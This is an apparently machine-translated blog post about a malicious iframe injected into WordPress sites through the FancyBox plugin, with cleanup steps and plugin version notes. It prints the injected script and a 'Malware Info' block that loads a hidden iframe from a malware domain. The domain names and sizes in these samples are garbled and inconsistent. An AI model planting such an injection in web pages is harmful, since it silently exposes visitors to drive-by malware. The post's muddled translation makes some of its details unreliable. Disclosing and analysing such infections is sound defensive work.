[Malware iframe 203koko] Malware Infected WordPress Websites

Earlier this week a number of websites and blogs WordPressHave received warnings malware infection via Google Webmasters.

The problem to which Google Webmasters referred to is the presence of a code / script iframe malware the source websites.

<script> if (navigator.userAgent.match (/ msie / i)) {document.write ('<iframe src = "http: /2000koko.eu/hjnfh/ipframe2000.php "width =" 203 "height =" 2 "> </ iframe> </ div> '); } </ Script>

It seems that it is a vulnerability a PluginacquisFancyBox for WordPress which until yesterday (05.02.2015) had not been updated for a long time.
Solving this problem and disinfecting viruses sites with this malware, is relatively simple.
1. Disable plugn Fancybox site.
2. Delete all FancyBox plugin files from the server (via FTP)
3. Install the new version of the plugin (Fancybox 3.0.4)

Fancybox for WordPress 3.0.4

- Renamed the setting Affected by the security issue mentioned in 3.0.3. This shouldnt stop the malicious code from appearing on sites where are the plugin is updated Without removing the malicious code.

Fancybox for WordPress 3.0.3

-Fixed a security issue.

Malware Info:

TYPE: Iframe redirection
TARGET: Fancybox WordPress
MALWARE DOMAIN: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW CODE: <iframe src = "http://xNUMXkoko.eu/hjnfh/ipframe203.php" width = "2" height = "20"> </ iframe>
MALWARE SCRIPT: <script> if (navigator.userAgent.match (/ MSIE / i)) {document.write ('<div style = "position: absolute; left: -2000px; width: 2000px">

Remove malware from your WordPress website.

[Malware iframe 203koko] Malware Infected WordPress Websites

About the author

Stealth LP

Founder and editor Stealth SettingsIn 2006 date.
Experience on Linux operating systems (especially CentOS), Mac OS X, Windows XP> Windows 10 and WordPress (CMS).

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment is processed.